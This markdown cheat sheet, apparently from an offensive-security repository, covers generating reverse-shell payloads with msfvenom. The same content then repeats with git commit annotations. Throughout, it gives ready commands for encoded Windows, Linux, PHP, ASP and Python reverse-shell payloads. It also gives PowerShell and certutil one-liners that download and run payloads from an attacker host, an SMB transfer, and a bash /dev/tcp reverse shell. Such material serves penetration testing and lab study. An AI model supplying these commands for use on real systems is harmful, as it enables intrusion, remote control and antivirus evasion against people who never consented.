killchain-compendium/reverse_shells/docs/msfvenom.md

# msfvenom Usage

* [Cheat Sheet](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/#waf-and-antivirus-detectionav-bypass-using-msfvenom-encoders)

```
msfvenom -p <payload> <options>
```

* syntax
```
<OS>/<arch>/<payload>
```
    * stageless 
    ```
    linux/x86/shell_reverse_tcp
    ```
    * staged 
    ```
    linux/x86/shell/reverse_tcp
    ```

## Windows
### x64 Reverse Shell in exe format
```
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
```

### x86 shikata_ga_nai
```
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe
```

### Getting the shell on target
* on attack machine, with shell.exe in cwd
```
python -m http.server
```
* on target machine execute this
```
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Start-Process "shell.exe"
```
or
```
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
```
or
```
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
```
or on cmd.exe
```sh
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
```
* Using SMB
On attacker
```sh
sudo python impacket/examples/smbserver.py dir .
```
on target
```sh
copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
```

## Unix
### netcat reverse 
```sh
msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<Port> -f elf -o shell.elf
```

* Alternatively, not msfvenom
```sh
bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"
```

### Include into Python Exploit as hex
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
```

## PHP
```sh
msfvenom -p php/reverse_shell LHOST=<attacker-IP> lPORT=4444 -f raw > reverse_shell.php
```
* Enclose raw file inside `<?php ... ?>` tags

## ASP
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f asp -o rev_shell.asp
```

## Python
```sh
msfvenom -p cmd/unix/reverse_python LHOST=<attacker-IP> LPORT=<attacker-Port> -f python -o reverse_shell.python
```
new stuff 2022-04-14 01:06:16 +02:00			`# msfvenom Usage`

			`* [Cheat Sheet](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/#waf-and-antivirus-detectionav-bypass-using-msfvenom-encoders)`
second commit 2021-08-23 01:13:54 +02:00
bump 2021-09-27 00:48:14 +02:00			```
			`msfvenom -p <payload> <options>`
			```
second commit 2021-08-23 01:13:54 +02:00
			`* syntax`
bump 2021-09-27 00:48:14 +02:00			```
			`<OS>/<arch>/<payload>`
			```
			`* stageless`
			```
			`linux/x86/shell_reverse_tcp`
			```
			`* staged`
			```
			`linux/x86/shell/reverse_tcp`
			```
second commit 2021-08-23 01:13:54 +02:00
			`## Windows`
			`### x64 Reverse Shell in exe format`
			```
bump 2021-10-16 00:40:15 +02:00			`msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>`
second commit 2021-08-23 01:13:54 +02:00			```

			`### x86 shikata_ga_nai`
			```
			`msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe`
			```

			`### Getting the shell on target`
			`* on attack machine, with shell.exe in cwd`
			```
			`python -m http.server`
			```
			`* on target machine execute this`
			```
			`powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"`

			`Start-Process "shell.exe"`
			```
			`or`
			```
			`powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port`
			```
			`or`
			```
			`powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"`
			```
bump 2021-09-08 02:09:14 +02:00			`or on cmd.exe`
			```sh
			`certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe`
			```
bump 2021-10-16 00:40:15 +02:00			`* Using SMB`
			`On attacker`
			```sh
			`sudo python impacket/examples/smbserver.py dir .`
			```
			`on target`
			```sh
			`copy \\<attacker-IP>\dir\shell.exe C:\shell.exe`
			```
second commit 2021-08-23 01:13:54 +02:00
			`## Unix`
			`### netcat reverse`
bump 2021-09-27 00:48:14 +02:00			```sh
			`msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R`
			`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<Port> -f elf -o shell.elf`
			```
second commit 2021-08-23 01:13:54 +02:00
			`* Alternatively, not msfvenom`
bump 2021-09-27 00:48:14 +02:00			```sh
			`bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"`
			```
second commit 2021-08-23 01:13:54 +02:00
			`### Include into Python Exploit as hex`
			```sh
bump 2021-09-27 00:48:14 +02:00			`msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4444 EXITFUNC=thread -b "\x00" -f py`
			```

			`## PHP`
			```sh
			`msfvenom -p php/reverse_shell LHOST=<attacker-IP> lPORT=4444 -f raw > reverse_shell.php`
			```
			* Enclose raw file inside `<?php ... ?>` tags

			`## ASP`
			```sh
			`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f asp -o rev_shell.asp`
			```

			`## Python`
			```sh
			`msfvenom -p cmd/unix/reverse_python LHOST=<attacker-IP> LPORT=<attacker-Port> -f python -o reverse_shell.python`
second commit 2021-08-23 01:13:54 +02:00			```